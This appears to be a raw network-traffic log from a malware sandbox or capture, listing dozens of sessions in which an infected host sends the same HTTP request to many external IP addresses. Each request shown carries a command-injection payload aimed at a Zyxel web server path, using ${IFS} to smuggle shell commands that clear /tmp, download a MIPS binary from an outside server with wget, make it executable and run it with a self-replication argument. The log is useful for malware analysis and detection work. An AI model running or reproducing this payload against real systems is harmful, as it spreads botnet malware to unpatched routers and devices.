                                        Jan 14, 2024 16:18:35.232537985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1849192.168.2.1340818124.116.127.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232572079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1850192.168.2.1339258178.231.134.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232606888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1851192.168.2.135985081.170.43.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232635975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1852192.168.2.133559681.33.110.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232700109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1853192.168.2.133428295.0.71.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232747078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1854192.168.2.134379458.131.222.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232790947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1855192.168.2.1335984158.19.48.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232820034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1856192.168.2.133640271.56.184.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232844114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1857192.168.2.1338162146.26.48.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232887030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1858192.168.2.1358064172.230.137.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232944012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1859192.168.2.1336818155.46.206.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.232973099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1860192.168.2.135023834.41.129.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233016014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1861192.168.2.13568809.93.234.88443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233052969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1862192.168.2.1340354136.152.57.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233100891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1863192.168.2.134987291.97.3.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233125925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1864192.168.2.1341482202.50.81.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233170986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1865192.168.2.1359942107.199.250.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233220100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1866192.168.2.1358008194.180.143.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233259916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1867192.168.2.1353924166.176.119.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233294010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1868192.168.2.136062234.228.117.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233328104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1869192.168.2.1348532100.30.233.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233381987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1870192.168.2.1341218120.18.117.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233412981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1871192.168.2.1335396144.6.119.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233510017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1872192.168.2.1343796132.148.90.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233515978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1873192.168.2.135311673.166.34.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233516932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1874192.168.2.1359870187.99.27.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233583927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1875192.168.2.1357458185.70.5.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233589888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1876192.168.2.1337550154.234.231.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233625889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1877192.168.2.135857037.182.58.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233645916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1878192.168.2.1359964189.68.72.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233709097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1879192.168.2.135174654.47.35.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233747005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1880192.168.2.135079495.173.87.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233782053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1881192.168.2.13552525.81.65.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233830929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1882192.168.2.134125682.30.198.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233855963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1883192.168.2.1339326132.38.225.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233903885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1884192.168.2.134685066.225.4.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233948946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1885192.168.2.1335080175.20.84.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.233978987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1886192.168.2.1342750139.126.105.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234030962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1887192.168.2.1350736135.207.42.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234049082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1888192.168.2.1359948137.221.6.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234100103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1889192.168.2.134408227.176.37.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234142065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1890192.168.2.1339862163.131.12.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234191895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1891192.168.2.1351434213.160.32.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234240055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1892192.168.2.1355166161.14.17.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234285116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1893192.168.2.1351134153.106.243.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234303951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1894192.168.2.135364013.156.255.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234349966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1895192.168.2.133579017.83.26.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234411955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1896192.168.2.1355270129.80.203.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234427929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1897192.168.2.1335120197.199.218.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234462023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1898192.168.2.1333448205.96.220.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234524965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1899192.168.2.1359626157.118.150.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234555960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1900192.168.2.135272292.140.124.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234611988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1901192.168.2.1359972182.9.129.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234642029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1902192.168.2.1352354119.205.255.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234703064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1903192.168.2.1340832218.21.156.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234735966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1904192.168.2.1355640205.233.253.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234771013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1905192.168.2.1338536197.5.238.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234842062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1906192.168.2.13441544.220.72.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234847069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1907192.168.2.1355864118.171.248.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234898090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1908192.168.2.133915684.49.161.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234935999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1909192.168.2.134950438.162.210.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.234977961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1910192.168.2.1354150117.200.206.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:35.235002041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1911192.168.2.1355762179.248.108.60443
                                        TimestampBytes transferredDirectionData
